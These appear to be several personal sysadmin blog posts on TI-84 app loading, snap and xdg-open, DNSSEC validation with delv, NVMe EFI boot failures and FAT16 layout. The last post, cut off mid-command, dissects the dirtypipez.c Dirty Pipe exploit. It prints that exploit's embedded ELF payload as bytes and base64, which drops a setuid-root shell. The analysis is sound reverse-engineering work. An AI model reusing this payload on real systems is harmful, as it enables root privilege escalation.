SUBSYSTEM=="usb", ATTR{idVendor}=="0451", ATTR{idProduct}=="e01c", ENV{ID_PDA}="1"
# TI-Nspire CX II
SUBSYSTEM=="usb", ATTR{idVendor}=="0451", ATTR{idProduct}=="e022", ENV{ID_PDA}="1"

LABEL="libticables_end"

reload udev using udevadm trigger;
start tilp2 and check that it communicates with the TI-84 — for instance by making a backup (it's a zip file);
download Cabri™ Jr. App for TI-84 Plus CE/T Family (CabriJr_CE.8ek);
download arTIfiCE.8xv (see HOWTO);
download your favorite game(s), or clibs.8xg and DOOM.8xp;
upload the bunch to the TI-84, using tilp2 and the Send File function;
start Cabri from the App menu, go to Open and run arTIfiCE;
there, you should be greeted with a new menu that lists the installed game(s).

Adding Cesium shell felt like overkill. It looks nice, but exiting it was not obvious (the Clear button?), and we do want to use the calculator for its intended purposes mainly.

2022-05-08 - thunderbird / opening links / ubuntu

For some reason, opening links from Thunderbird stopped working. When clicking a URL, I expected Chromium to open the website, but nothing happened.

After visiting a few bug reports and the Thunderbird advanced configuration, I turned my attention to xdg-open:

$ xdg-open 'https://wjd.nu'
ERROR: not connected to the gnome-3-38-2004 content interface.

Okay. So it wasn't a Thunderbird problem at all.

The culprit was that I had been doing some housekeeping in snap. (I could fill a rant about what I dislike about snap/snapcraft, by the way: silent automatic updates (you can only make it non-silent but still automatic), lots of squashfs mounts/directory entries when not used (why not mount on application startup?), recurring broken fonts, flaky GNOME integration, not enough revisions accessible to go back to a working version, and those are merely UX complaints. Trying to fix a broken snap is near impossible (first verify, but then what?), while with apt-get source + dpkg-buildpackage you can rebuild a modified package in minutes. And then I didn't even bring up the controversy of why there is only one snap store, on which I — for once — do not have a strong opinion.)</rant>

Fixing the opening of links was a matter of:

$ snap install gnome-3-38-2004
gnome-3-38-2004 0+git.1f9014a from Canonical✓ installed

And now opening links works again. I have no idea why I need an extra 260MiB just to be able open links. We can chalk it up to “another great advantage of snap”.

$ df -h | grep gnome
/dev/loop10  163M 163M 0 100% /snap/gnome-3-28-1804/145
/dev/loop32  165M 165M 0 100% /snap/gnome-3-28-1804/161
/dev/loop0   249M 249M 0 100% /snap/gnome-3-38-2004/99

Sigh..

Update 2022-08-27

The most prominent list of why Snapcraft/snap is One Giant Disappointment in 2022:

Chromium not having read permissions on readable files;
recurring broken fonts;
silent/uncontrollable automatic updates (and no, refresh-app-awareness is not a solution, even those working at Canonical dislike it);
not enough revisions accessible to go back to a working version;
missing udev rules that are hard to debug;
confinement without telling the users (if we don't know we're being confined, we run into very obscure problems).

Apart from the actual bugs, they boil down to losing control on your own Linux system: losing control of building/rebuilding of packages; losing control of when/how to update; losing control over permissions through the extra sandboxing.

2022-03-24 - dnssec validation / authoritative server

The delv(1) tool is the standard way to validate DNSSEC signatures. By default it will validate up to the DNS root zone, for which it knows and trusts the DNSKEY. If you want to validate only a part of a chain, you'll need to know a few things.

Regular DNSSEC validation

Using delv is normally as simple as this:

$ delv -t A @1.1.1.1 dnssec.works.
; fully validated
dnssec.works.   3600  IN  A 5.45.107.88
dnssec.works.   3600  IN  RRSIG A 8 2 3600 20220408113557 20220309112944 63306 dnssec.works. O+...

(1.1.1.1 is the IP of Cloudflare's free recursive resolver. If you don't know the difference between a recursive and authoritative DNS server, you may want to look that up now.)

For unsigned hostnames:

$ delv -t A @1.1.1.1 apple.com.
; unsigned answer
apple.com.    900 IN  A 17.253.144.10

And for badly signed hostnames:

$ delv -t A @1.1.1.1 fail01.dnssec.works.
;; resolution failed: SERVFAIL

(The DNSSEC signature for fail01.dnssec.works. hostname is invalid by design. This aids in testing.)

Sidenote: we add the period (".") to the end of the hostname so additional domain searches are not tried — see domain or search in /etc/resolv.conf. Without it, a system resolver might also try apple.com.yourdomain.tld.

Trace DNS lookups with dig

When using dig with +trace, we can see how a lookup would be performed by a recursing DNS server (like 1.1.1.1).

$ dig -t A fail01.dnssec.works. +trace
...
.                       6875  IN  NS  k.root-servers.net.
...
works.                172800  IN  NS  v0n3.nic.works.
...
dnssec.works.           3600  IN  NS  ns5.myinfrastructure.org.
...
fail01.dnssec.works.    3600  IN  A 5.45.109.212

As you can see, dig will not do DNSSEC validation. The recursor (at 1.1.1.1) does though. It rightly responded with a SERVFAIL because there is something wrong.

In this case, the problem being that a DS record for the hostname exists but the nameserver did not provide an RRSIG at all:

$ dig -t DS @ns5.myinfrastructure.org. fail01.dnssec.works. +short
41779 8 2 A73A4215B94FD90C2E6B94BD0513C7A82C4A1E592FD686420573E611 A1D29DE1

$ dig -t A @ns5.myinfrastructure.org. fail01.dnssec.works. +dnssec |
    awk '{if($4=="RRSIG"&&$5=="A")print}'
(no response)

Trace DNS lookups with delv

So, how does delv do this validation?

For a valid hostname, things look like this:

$ delv -t A @1.1.1.1 dnssec.works. +rtrace
;; fetch: dnssec.works/A
;; fetch: dnssec.works/DNSKEY
;; fetch: dnssec.works/DS
;; fetch: works/DNSKEY
;; fetch: works/DS
;; fetch: ./DNSKEY
; fully validated
dnssec.works.   3600  IN  A 5.45.107.88

delv does not ask other nameservers than the supplied server. But it will ask for all relevant information to be able to verify the hostname signatures.

From the output above, we see that the validation happens bottom-up (contrary to a DNS query which happens top-down): we get a record, look for the DNSKEY, look for the DS, get the next DNSKEY, etc., all the way to the root DNSKEY.

If we try this on an authoritative nameserver — one that explicitly does not recurse — we'll get an error.

$ dig -t NS @1.1.1.1 dnssec.works. +short
ns3.myinfrastructure.org.
ns5.myinfrastructure.org.

$ dig -t A @1.1.1.1 ns3.myinfrastructure.org. +short
5.45.109.212

(We looked up the IP 5.45.109.212 of the authoritative nameserver manually, so as not to clutter the following output.)

$ delv -t A @5.45.109.212 dnssec.works.
;; chase DS servers resolving 'dnssec.works/DS/IN': 5.45.109.212#53
;; REFUSED unexpected RCODE resolving 'works/NS/IN': 5.45.109.212#53
;; REFUSED unexpected RCODE resolving './NS/IN': 5.45.109.212#53
;; REFUSED unexpected RCODE resolving 'works/DS/IN': 5.45.109.212#53
;; no valid DS resolving 'dnssec.works/DNSKEY/IN': 5.45.109.212#53
;; broken trust chain resolving 'dnssec.works/A/IN': 5.45.109.212#53
;; resolution failed: broken trust chain

As promised, an error.

The nameserver at 5.45.109.212 (that knows dnssec.works.) refuses to answer requests for which it is not the authority: in this case the DS record, which is supposed to be in the parent zone. That is correct behaviour. But that is annoying if we want to test the validity of records returned by an authoritative nameserver. Can we work around that?

Creating the delv anchor-file

As we saw above, delv validation starts by looking up the DNSKEY and DS records for the hostname. Your authoritative nameserver will have the DNSKEY, but not the DS record(s):

$ dig -t A @5.45.109.212 dnssec.works. +short
5.45.107.88

$ dig -t DNSKEY @5.45.109.212 dnssec.works. +short
257 3 8 AwEAAePcoDyvYNNO/pM4qLxDQItc...

$ dig -t DS @5.45.109.212 dnssec.works.
...
;; WARNING: recursion requested but not available

The DS record can be found at the nameserver of the parent zone:

$ dig -t NS @1.1.1.1 works. +short
v0n0.nic.works.

$ dig -t DS @v0n0.nic.works. dnssec.works. +short
41779 8 2 A73A4215B94FD90C2E6B94BD0513C7A82C4A1E592FD686420573E611 A1D29DE1

As expected, there it is.

So, in order for us to validate only the behaviour/responses of the 5.45.109.212 nameserver, we have to "pre-load" the DS key. We'll whip up a small shell script for that:

make_trust_anchors() {
    local recursor='1.1.1.1'
    local awk='{printf "  \"%s\" %s %s %s %s \"%s\";\n",D,N,$1,$2,$3,$4}'
    echo "trust-anchors {"
    for name in "$@"; do
        # DNSKEY: Contains the public key that a DNS
        # resolver uses to verify DNSSEC signatures
        # in RRSIG records.
        delv -t DNSKEY @$recursor "${name%.}." +short +split=0 |
          awk -vD="${name%.}." -vN=static-key "/^257 /$awk"
        # DS: Holds the name of a delegated zone.
        # References a DNSKEY record in the sub-delegated
        # zone. The DS record is placed in the parent
        # zone along with the delegating NS records.
        delv -t DS @$recursor "${name%.}." +short +split=0 |
          awk -vD="${name%.}." -vN=static-ds "$awk"
        # (delv requires one of the above)
    done
    echo "};"
}

(By using delv to look up the DNSKEY and DS, we even validate those against our trusted root zone key.)

If we run that snippet, we see this:

$ make_trust_anchors dnssec.works.
trust-anchors {
  "dnssec.works." static-key 257 3 8 "AwEAAa+YwrBlCwfJzwmsSK87hKFAm+yz03z5pZwZWpMRJu33+GQLswgZJJX/iOTcjwHdpQXvbAHwNhLtTJ1Pp46b55Q8+zH7DkvqQAJyDTfjVXEyX/745e/5CCPAkVGnaZihj9jqichokDfWkAOJvGxqg9HdqsLmXH3a2GrxFfvwsdSPuBwQmSVzURIyZMMxRC+GH2B+ADGWxJNvrspS0lf9svfkrdMvG4hjLhwNViDSjdx9yb4yRH/+TgvTAkYS/6iB8FLBKnltYtsXuveovKp9Dwq+xllqvUQTkRK90aUQEQa8G8ukecJbIliCrPJH7JK2IaDX8ezoYZ4QMZPc2y/K8FHK0G7EVDcgwskGj/NdfEHUuBdw+Vr9eHu8x6aoU/tnTRI7qI2HmCUqcVLSEGJAmKu4A7lqVP2Xw6cpROGviS6Z";
  "dnssec.works." static-ds 41779 8 2 "A73A4215B94FD90C2E6B94BD0513C7A82C4A1E592FD686420573E611A1D29DE1";
};

And — using Bash process subtitution — we can feed that output to delv:

$ delv -t A @5.45.109.212 dnssec.works. \
    -a <(make_trust_anchors dnssec.works.) \
    +root=dnssec.works.
; fully validated
dnssec.works.   3600  IN  A 5.45.107.88
dnssec.works.   3600  IN  RRSIG A 8 2 3600 20220408113557 20220309112944 63306 dnssec.works. O++...

Cool. Now we can ask an authoritative server and validate its response.

NOTE: You do need bind9-dnsutils 9.16 or newer for this to work. Otherwise you'll get a unknown option 'trust-anchors'.

Validating authoritative server responses with an anchor-file

Using the make_trust_anchors snippet works for all subdomains served by the same DNS server:

$ delv -t A @5.45.109.212 www.dnssec.works. \
    -a <(make_trust_anchors dnssec.works.) \
    +root=dnssec.works.
; fully validated
www.dnssec.works. 3600  IN  A 5.45.109.212
www.dnssec.works. 3600  IN  RRSIG A 8 3 3600 20220420081240 20220321074251 63306 dnssec.works. 2Pq...

Let's check the invalid one:

$ delv -t A @5.45.109.212 fail01.dnssec.works. \
    -a <(make_trust_anchors dnssec.works.) \
    +root=dnssec.works.
;; insecurity proof failed resolving 'fail01.dnssec.works/A/IN': 5.45.109.212#53
;; resolution failed: insecurity proof failed

Or another invalid one:

$ delv -t A @5.45.109.212 fail02.dnssec.works. \
    -a <(make_trust_anchors dnssec.works.) \
    +root=dnssec.works.
;; validating fail02.dnssec.works/DNSKEY: verify failed due to bad signature (keyid=2536): RRSIG has expired
;; validating fail02.dnssec.works/DNSKEY: no valid signature found (DS)
;; no valid RRSIG resolving 'fail02.dnssec.works/DNSKEY/IN': 5.45.109.212#53
;; broken trust chain resolving 'fail02.dnssec.works/A/IN': 5.45.109.212#53
;; resolution failed: broken trust chain

The purpose

Why would you do this?

For one, out of curiosity. But if you're moving your DNS data to a new authoritative server, it is wise to confirm that the signatures are still correct.

2022-03-10 - nvme drive refusing efi boot

UEFI is the current boot standard. Instead of fighting it, we've adopted it as the default for all hardware machines we install. We've had some issues in the past, but they could all be attributed to a lack of knowledge by the operator, not by a problem with EFI itself. But, this time we couldn't figure out why the SuperMicro machine refused to boot from these newly installed EFI partitions: no bootable UEFI device found.

Spoiler: it was an improperly formatted FAT32 filesystem, but we'll get to that in a moment.

Setting up storage on new machines

When setting up new hardware, we use a script that partitions and formats drives per our needs. For NVMe drives, we must however first select the logical sector size. By default these drives are in 512-byte compatibility mode. For their performance and lifespan, it's better to choose their native sector size, which is usually 4096 bytes.

Doing that, looks somewhat like this:

DEV=/dev/nvme0n1

# List possible lba formats. The output might
# look like this, where lower rp is better:
# ...
# lbaf  0 : ms:0   lbads:9  rp:0x2 (in use)
# lbaf  1 : ms:8   lbads:9  rp:0x2
# lbaf  2 : ms:16  lbads:9  rp:0x2
# lbaf  3 : ms:0   lbads:12 rp:0
# lbaf  4 : ms:8   lbads:12 rp:0
# lbaf  5 : ms:64  lbads:12 rp:0
# lbaf  6 : ms:128 lbads:12 rp:0
nvme id-ns $DEV

# Select 4096 (1<<12) bytes per cluster:
nvme format --lbaf=3 $DEV

(Once it's set, one can check that it's optimal by running nvme_check_best_sector() in sadfscheck.)

Next up, is partitioning:

# First usable sector is 34 (x512b or 6x4096b), we skip the entire MB.
sgdisk -n1:1M:+1M  -t1:EF02 -c1:biosboot $DEV   # BIOS-boot, or
sgdisk -n2:0:+510M -t2:EF00 -c2:efi      $DEV   # EFI System
sgdisk -n3:0:+1G   -t3:8300 -c3:boot     $DEV   # /boot (type 8300 for Linux, or BE01 for ZFS)
sgdisk -n4:0:0     -t4:8300 -c4:root     $DEV   # /

Adding a small 1 MiB partition allows us to fall back to old style BIOS-boot. But commonly the real booting happens off the second partition, which is 510 MiB large: more than sufficient for any EFI binaries we may need.

Formatting the filesystems:

mkfs.fat -F 32 -n EFI ${DEV}p2  # (*BAD)

mkfs.ext2 -t ext2 -L boot ${DEV}p3  # or something else for ZFS

mkfs.ext4 -t ext4 -L root ${DEV}p4  # or something else for ZFS

At this point, we let debootstrap(8) work its magic. And after some waiting and some finalizing, we have a bootable Ubuntu/Linux system.

Mirror disks and booting

For the boot/root filesystems, we generally want a mirror setup, so disk failure isn't an immediate catastrophy. We use either ZFS mirrors or Linux Software Raid for this. The mirroring components make sure that the partitions on either drive are redundant and interchangeable. This ensures that if one drive completely fails, we can still boot from the other.

Except for that EFI partition... Because it has a FAT filesystem... And it therefore does not do any fancy mirroring.

Luckily, we got that sorted quite easily using efibootmirrorsetup — a helper script that keeps the two EFI partitions in sync, and places the EFI partitions of both drives first in the BootOrder.

Running it is as easy as calling efibootmirrorsetup with the two mirror drives as arguments:

efibootmirrorsetup /dev/nvme0n1 /dev/nvme1n1

It's an interactive tool, which won't do anything without your permission. With your permission, it formats the EFI partition on the second drive with a FAT filesystem and ensures that grub(8) updates are always applied to both partitions.

EFI set up correctly

At this point, we should have everything set up correctly:

# efibootmgr
BootCurrent: 0004
Timeout: 1 seconds
BootOrder: 0004,0000,0002,0001
Boot0000* nvme-KCD6DLUL1T92_61A
Boot0001  Network Card
Boot0002* UEFI: Built-in EFI Shell
Boot0004* nvme-KCD6DLUL1T92_41E

Two boot images have been prepended to the BootOrder. efibootmirrorsetup has been kind enough to use the device name/serial so you can easily identify and select a non-faulty drive in case of hardware failures.

Looking at efibootmgr -v also shows the drive and file:

HD(2,GPT,df57901e-9a47-4393-9470-94afaa56a58f,0x200,0x1fe00)/File(\EFI\UBUNTU\SHIMX64.EFI)

The values listed, are:

2 = partition number
GPT = the partitions follow GUID Partition Table (GPT) layout
df57901e-9a47-4393-9470-94afaa56a58f = the partition UUID (see also: blkid)
0x200 = the EFI filesystem starts at the 512th sector (at 2 MiB when using 4 KiB sectors)
0x1fe00 = the filesystem fits on 130560 sectors (510 MiB, when using 4 KiB sectors)
File(\EFI\UBUNTU\SHIMX64.EFI) = path to the boot loader

No EFI filesystem found

Yet, when rebooting, we found ourselves dropped into an UEFI shell. Suddenly the setup that had worked previously did not work.

If you're new to the EFI shell, it feels both cryptic and old fashioned. The most important tip I have for you is -b for pagination:

Shell> help -b
...
(listing of all available commands, paginated)

Shell> help -b map
...
(listing help for map, showing among others "map fs*")

Shell> map -b
...
     BLK0: Alias(s):
          PciRoot(0x0)/Pci(0x1,0x1)/Pci(0x0,0x0)/NVMe(0x1,00-01-0D-91-FE-A2-C1-08)
         Handle:      [1D2]
         Media Type:  Unknown
         Removable:   No
         Current Dir: BLK0:
     BLK1: Alias(s):
          PciRoot(0x0)/Pci(0x1,0x1)/Pci(0x0,0x0)/NVMe(0x1,00-01-0D-91-FE-A2-C1-08)/HD(1,GPT,243727B8-73F9-41C9-8D06-70EB75472690,0x100,0x100)
         Handle:      [1D3]
         Media Type:  HardDisk
         Removable:   No
         Current Dir: BLK1:
     BLK2: Alias(s):
          PciRoot(0x0)/Pci(0x1,0x1)/Pci(0x0,0x0)/NVMe(0x1,00-01-0D-91-FE-A2-C1-08)/HD(2,GPT,DF57901E-9A47-4393-9470-94AFAA56A58F,0x200,0x1FE00)
         Handle:      [1D4]
         Media Type:  HardDisk
         Removable:   No
         Current Dir: BLK2:
     BLK3: Alias(s):
          PciRoot(0x0)/Pci(0x1,0x1)/Pci(0x0,0x0)/NVMe(0x1,00-01-0D-91-FE-A2-C1-08)/HD(3,GPT,2AD728A8-2142-43F0-8FB7-54B399B2AEB6,0x20000,0x40000)
         Handle:      [1D5]
         Media Type:  HardDisk
         Removable:   No
         Current Dir: BLK3:
...

There they were, the partitions, and particularly that BLK2. But there should be more than just partitions. There should also be filesystems, denoted by FSn.

(For a brief moment, I entertained the thought that UEFI couldn't cope with 4096 byte sector sizes, but that would be too improbable. Larger sector sizes had existed long before the UEFI standard was drafted.)

I messed around quite a bit in the UEFI shell. Listing hex dumps of BLK2 (dblk), displaying the current boot config (bcfg boot dump) and so forth.

Sidenote: the interactive hex editor (hexedit) on the Intel platform said Ctrl-E for help. But ctrl-E did nothing. Function keys did work: F1 = jump to offset, F2 = save, F3 = exit, ..., F7 = paste, F8 = open, F9 block open). You may be most interested in "exit". I was ;-)

After giving in to the improbable hunch that large sectors were the culprit, I created an EFI partition with a 512 byte sector size. Booting worked again! There definitely was something going on with the sector size.

Here is output of EFI subsystem handles, where one filesystem (with 512 byte sectors) worked, and one (with 4096 byte sectors) did not:

Shell> dh -p diskio
...
1FE: SimpleFileSystem DiskIO EFISystemPartition PartitionInfo BlockIO DevicePath(..6AB46D5FA0DF,0x1000,0xFF000))
...
203: DiskIO EFISystemPartition PartitionInfo BlockIO DevicePath(..-94AFAA56A58F,0x200,0x1FE00))
...

Observe how the second one does not list the SimpleFileSystem. (As we've seen earlier, 0x1000 and 0x200 are the sector offsets. For the 4096 byte sector size, the offset is lower, but points to the same byte offset.)

And, even more verbosely:

Shell> dh 1FE -v
1FE: 85F2A898
SimpleFileSystem(85F0B030)
DiskIO(85F297A0)
EFISystemPartition(0)
PartitionInfo(85F2A368)
  Partition Type       : GPT
  EFI System Partition : Yes
BlockIO(85F2A2B0)
  Fixed MId:0 bsize 200, lblock FEFFF (534,773,760), partition rw !cached
DevicePath(85F2AB18)
  PciRoot(0x0)/Pci(0x1,0x1)/Pci(0x0,0x0)/NVMe(0x1,00-01-0D-91-FF-A1-C1-07)/HD(2,GPT,DFE346BA-05A8-4B9C-A6D2-6AB46D5FA0DF,0x1000,0xFF000)

Shell> dh 203 -v
203: 85EEF718
DiskIO(85EA57A0)
EFISystemPartition(0)
PartitionInfo(85EEF368)
  Partition Type       : GPT
  EFI System Partition : Yes
BlockIO(85EEF2B0)
  Fixed MId:0 bsize 1000, lblock 1FDFF (534,773,760), partition rw !cached
DevicePath(85EEFC98)
  PciRoot(0x0)/Pci(0x1,0x2)/Pci(0x0,0x0)/NVMe(0x1,00-01-0D-91-FE-A2-C1-08)/HD(2,GPT,DF57901E-9A47-4393-9470-94AFAA56A58F,0x200,0x1FE00)

(At this point you may be wondering how I got these screen dumps. The UEFI shell was on a remote SuperMicro machine connected over IPMI using iKVM, an ancient Java applicationwhich does not support screen grabbing at all. The answer: I wrote a quick OCR tool for this purpose, ikvmocr, which converts screenshots of a console to text. It depends on Python PIL only, and is more than 99% accurate.)

FAT versions

Yesterday, I wrote about the FAT16 filesystem layout for this reason.

When creating the tools that set up EFI partitions, I had incorrectly assumed that FAT32 was the default nowadays. It is not. The appropriate FAT version for your needs depends on the size of the partition and the desired cluster size.

And due to a bug in dosfstools 4.1 (and older), we were creating too few clusters on the FAT32 partition when the drives had 4096 byte sectors ("This only works correctly for 512 byte sectors!"). These partitions would work just fine on Linux as it uses different heuristics to detect the FAT version. But the EFI SimpleFileSystem Driver would use the official recommendation, detecting FAT16 and then not recognising the rest of the filesystem, dropping it from the possible boot options.

The (official) rules: begin by taking the (data) sector count, which is a slight bit less than the total partition size, divided by the sector size in bytes. Thus, take 510 MiB, divide by sector-size 4096, get 130,560 sectors. Divide by the sectors per cluster, commonly 2 or 4 (use file -s if you don't know). Now you have 65,280 or 32,640 clusters (slightly less, actually).

Then, check this table:

clusters	FAT version
< 4,085	FAT12
< 65,525	FAT16 (both 65,280 and 32,640 are here)
>= 65,525	FAT32

For the smaller 512 byte cluster size, mkfs.fat would have selected a cluster size of 16: 510 MiB / 512 / 16, also 65,280, except if you selected FAT32, in which case it would lower the sectors per cluster so the cluster count would exceed 65,525. For the larger cluster size, this calculation was not performed correctly.

Lessons learnt: don't use FAT32 for partitions smaller than 1 GiB unless you also check the sectors-per-cluster.

Addendum (2022-03-24)

The UEFI Spec states in 13.3 File System Format that “EFI encompasses the use of FAT32 for a system partition, and FAT12 or FAT16 for removable media.” That suggests using FAT32 (and many websites out there suggest the same). However, the specification also mandates support for the other FAT versions.

Most important is that the partition is aligned on the (larger of the logical or physical) sector size. If you opt to run with FAT32, make sure the sectors per cluster value is low enough, so you get at least 65,525 clusters: for 4 KiB clusters you'll need at least 256.5 MiB (*), for 8 KiB clusters at least 512.5 MiB (**).

(*) 2*4096 (reserved) + 2*256*1024 (2xFAT32) + 4096*65525 (data)
(**) 2*4096 (reserved) + 2*256*1024 (2xFAT32) + 8192*65525 (data)

2022-03-09 - fat16 filesystem layout

First there was FAT, then FAT12, FAT16 and finally FAT32. Inferior filesystems nowadays, but nevertheless both ubiquitous and mandatory for some uses. And sometimes you need to be aware of the differences.

A short breakdown of FAT16 follows — we'll skip the older FAT as well as various uncommon settings, because those are not in active use.

Sector size

The storage device defines (logical) sector sizes. This used to be 512 bytes per sector for a long time (we're skipping pre-hard disk tech), but this is now rapidly moving to 4096 bytes per sector on newer SSD and NVMe drives. Both the partition table and the filesystems record this size somewhere.

Boot sector

The first sector of FAT16 (or any other FAT version for that matter) holds the boot sector. How long the sector is, depends on the sector size (commonly 512 or 4096 bytes). At offset 0x00B two bytes hold the bytes per sector. Commonly 00 02 (512 little endian) or 00 10 (4096 little endian).

At 0x00D one byte holds the sectors per cluster. This must be a power of two (1, 2, 4, ...). In the data area of the filesystem, files are accessed by cluster number. A cluster can hold at most one chunk of a single file. If the amount of bytes per cluster is large, you'll waste space if you have many small files. Conversely, if you have only large files, you can choose larger and fewer clusters, making the allocation tables more efficient.

Let's look at the hex dump of a cleanly initialized FAT filesystem. We'll compare FAT16 created with 512 byte sector sizes, with FAT16 with 4096 byte sector sizes. You can reproduce by running dd if=/dev/zero of=fat16.img bs=1M count=510 to create an empty filesystem image and running mkfs.fat -F 16 -S 512 -s 16 fat16.img or mkfs.fat -F 16 -S 4096 -s 2 fat16.img to make a filesystem on it. (-s defines sectors per cluster.)

--- fat16-512
+++ fat16-4096
@@ -1,3 +1,3 @@
-00000000  eb 3c 90 6d 6b 66 73 2e  66 61 74 00 02 10 10 00  |.<.mkfs.fat.....|
+00000000  eb 3c 90 6d 6b 66 73 2e  66 61 74 00 10 02 02 00  |.<.mkfs.fat.....|
-00000010  02 00 02 00 00 f8 00 01  20 00 40 00 00 00 00 00  |........ .@.....|
+00000010  02 00 02 00 00 f8 20 00  20 00 40 00 00 00 00 00  |...... . .@.....|
-00000020  00 f0 0f 00 80 00 29 ff  fc 1e d8 4e 4f 20 4e 41  |......)....NO NA|
+00000020  00 fe 01 00 80 00 29 77  4c de d8 4e 4f 20 4e 41  |......)wL..NO NA|
...
 *
 00002000  f8 ff ff ff 00 00 00 00  00 00 00 00 00 00 00 00  |................|
 00002010  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
 *
 00022000  f8 ff ff ff 00 00 00 00  00 00 00 00 00 00 00 00  |................|
 00022010  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
...

Indeed, we see 00 02 versus 00 10 for the bytes per sector, and 10 (16) versus 02 (2) for sectors per cluster. The cluster size is 8192 for both: 512 * 0x10 or 4096 * 0x2.

Next, at 0x00E, is the count of reserved sectors. mkfs.fat(8) defaults this to the same number as clusters per sector. (Also 8192 bytes.)

Then, at 0x010, there's the count of FATs — that is, the File Allocation Tables, the tables that hold linked lists of cluster positions, specifying in which clusters a file resides. This is always 2, i.e. two copies, for redundancy.

At 0x013, two bytes hold the total logical sectors (not valid for FAT32) or 0, in which case a four byte value is at 0x020. Here we see 00 f0 0f 00 (1044480 sectors) and 00 fe 01 00 (130560 sectors) respectively. For a 510 MiB filesystem this is indeed correct.

And at 0x016 we see 00 01 (256) or 20 00 (32) sectors per FAT. In both cases 128 KiB.

After the boot sector

After the reserved sectors (only the boot sector for FAT16), 8 KiB in this case, there are the two FATs (2 * 128 KiB) and finally the data.

Directory entries (containing filenames and pointers into the FAT) are special types of files. For FAT16, the root directory entry is actually at a fixed position (after the last FAT), with at most 512 32-byte entries (00 02 seen at 0x11). Subdirectory entries are located in the data area, just like regular files.

Taking the values from above, the filesystem layout looks like this (for 512-bytes per sector and 4096-bytes per sector respectively):

offset	size	calc. 512	calc. 4K	name
0x00000	0x2000	16*512	2*4096	reserved sectors, including boot sector
0x02000	0x20000	256*512	32*4096	1st FAT
0x22000	0x20000	256*512	32*4096	2nd FAT
0x42000	0x4000	512*32	512*32	root directory area
0x46000	0x4000	2*8192	2*8192	data area, cluster 0 (boot code) + cluster 1
0x4a000	(clusters-2) * bytes_per_cluster			data area, files and subdirectory entries

Total number of clusters

Computing the number of clusters in the data area is done by taking the total number of sectors (from 0x013 or 0x020), subtracting the reserved sectors (see 0x00E), FAT sectors (from 0x016) and root directory (32 and 4 sectors respectively), and dividing, rounding down, by the number of sectors in a cluster (at 0x00D).

For the 512 byte sector filesystem above, that means:
floor((1044480 - 16 - 2*256 - 32) / 16) = 65245 clusters (509.7 MiB)

For the 4096 byte sector filesystem above, that means:
floor((130560 - 2 - 2*32 - 4) / 2) = 65245 clusters (509.7 MiB)

Which FAT version are we dealing with?

While you would think that somewhere in the FAT headers, there would be a version field. There isn't one.

According to Microsoft's EFI FAT32 specification, any FAT file system with less than 4085 clusters is FAT12. If it has less than 65,525 clusters, it's FAT16. Otherwise it is FAT32.

Why am I telling you all this? That's for tomorrow's post.

2022-03-08 - reading matryoshka elf / dirtypipez

While looking at the clever dirtypipez.c exploit, I became curious how this elfcode was constructed.

On March 7 2022, Max Kellerman disclosed a vulnerability he found in Linux kernel 5.8 and above called The Dirty Pipe Vulnerability. Peter (blasty) at haxx.in quickly created a SUID binary exploit for it, called dirtypipez.c. This code contains a tiny ELF binary which writes another binary to /tmp/sh — the ELF Matryoshka doll.

I was wondering how one parses this code — to ensure it does what it says it does, and just because.

The code looks like this:

unsigned char elfcode[] = {
  /*0x7f,*/ 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e, 0x00, 0x01, 0x00, 0x00, 0x00,
  0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00, 0x01, 0x00, 0x00, 0x00,
...

With a leading explanation:

// small (linux x86_64) ELF file matroshka doll that does;
//   fd = open("/tmp/sh", O_WRONLY | O_CREAT | O_TRUNC);
//   write(fd, elfcode, elfcode_len)
//   chmod("/tmp/sh", 04755)
//   close(fd);
//   exit(0);
//
// the dropped ELF simply does:
//   setuid(0);
//   setgid(0);
//   execve("/bin/sh", ["/bin/sh", NULL], [NULL]);

Base64 encoded, the entire elfcode is:

f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAeABAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAEAAOAAB
AAAAAAAAAAEAAAAFAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAAlwEAAAAAAACXAQAAAAAAAAAQ
AAAAAAAASI09VgAAAEjHxkECAABIx8ACAAAADwVIicdIjTVEAAAASMfCugAAAEjHwAEAAAAPBUjH
wAMAAAAPBUiNPRwAAABIx8btCQAASMfAWgAAAA8FSDH/SMfAPAAAAA8FL3RtcC9zaAB/RUxGAgEB
AAAAAAAAAAAAAgA+AAEAAAB4AEAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAQAA4AAEAAAAAAAAA
AQAAAAUAAAAAAAAAAAAAAAAAQAAAAAAAAABAAAAAAAC6AAAAAAAAALoAAAAAAAAAABAAAAAAAABI
Mf9Ix8BpAAAADwVIMf9Ix8BqAAAADwVIjT0bAAAAagBIieJXSInmSMfAOwAAAA8FSMfAPAAAAA8F
L2Jpbi9zaAA=

Let's place that in decoded form in dirtypipez-matryoshka.elf.

Now, how do we read this blob?

$ readelf -h dirtypipez-matryoshka.elf
ELF Header:
  Magic:   7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00
  Class:                             ELF64
...
  Entry point address:               0x400078
  Start of program headers:          64 (bytes into file)
  Start of section headers:          0 (bytes into file)
  Flags:                             0x0
  Size of this header:               64 (bytes)
  Size of program headers:           56 (bytes)
...

$ readelf -l dirtypipez-matryoshka.elf

Elf file type is EXEC (Executable file)
Entry point 0x400078
There is 1 program header, starting at offset 64

Program Headers:
  Type           Offset             VirtAddr           PhysAddr
                 FileSiz            MemSiz              Flags  Align
  LOAD           0x0000000000000000 0x0000000000400000 0x0000000000400000
                 0x0000000000000197 0x0000000000000197  R E    0x1000

So, the entrypoint is at 0x400078 - 0x400000 = 0x78, which coincides with 64 (elf header) + 56 (program header) = 0x78. Time to disassemble using objdump(1):

$ objdump -D -m i386:x86-64 -b binary \
    --start-address=0x78 dirtypipez-matryoshka.elf
...

We'll need a few prerequisites to be able to annotate that output.

$ grep -E '#define (O_WRONLY|O_CREAT|O_TRUNC)' \
